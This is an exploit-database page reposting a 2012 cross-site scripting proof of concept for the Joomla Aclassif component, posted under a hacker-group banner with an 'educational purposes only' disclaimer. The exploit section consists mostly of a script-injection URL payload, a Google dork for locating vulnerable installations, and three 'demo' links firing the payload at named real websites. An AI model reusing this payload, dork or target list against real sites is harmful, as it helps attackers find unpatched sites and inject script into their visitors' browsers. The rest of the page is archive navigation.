Joomla Aclassif Cross Site Scripting

Joomla Aclassif Cross Site Scripting: Posted Dec 26, 2012; Authored by TUNISIAN CYBER; Joomla Aclassif component suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.; tags | exploit, xss; SHA-256 | 65a9f345fa956ae08a3fb1a20e2db25b401fc7ad9e6e7128abc75ff3b708c0f9; Download | Favorite | View

Joomla Aclassif Cross Site Scripting

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm TUNISIAN CYBER member from Inj3ct0r Team           1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title:  Joomla Component com_aclassif XSS Vulnerability
[+] Date: 25-12-2012
[+] Category: WebApp
[+] Google Dork: inurl:"index.php?option=com_aclassif"
[+] Tested on: Win 7
[+] Twitter: @a0a0a5
####################################################################################
 
 
#################################################################################
|||                         ~~ Use It At Your Own Risk ~~                     |||
|||                    It's For Educational Purpos Only                       |||
|||                    I'm not Responsible For Any Damage                     |||
#################################################################################
 

 
 ==============================
Vulnerabilies:
127.0.0.1/index.php/component/aclassif/?'"--></style></script><script>alert(1337)</script>

Exploit:
http://i46.tinypic.com/145irq.png

Demos:

http://globalhookup.com/index.php/component/aclassif/?'"--></style></script><script>alert(1337)</script>
http://thegreekstar.com/index.php/component/aclassif/?%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%281337%29%3C/script%3E
http://www.bonanza.org//index.php/component/aclassif/?'"--></style></script><script>alert(1337)</script>
 
>>Thanks To All TN Hackers and 1337day team<<

Top Authors In Last 30 Days

Red Hat 270 files
indoushka 152 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Debian 27 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Joomla Aclassif Cross Site Scripting

Joomla Aclassif Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Aclassif Cross Site Scripting

Share This

Joomla Aclassif Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems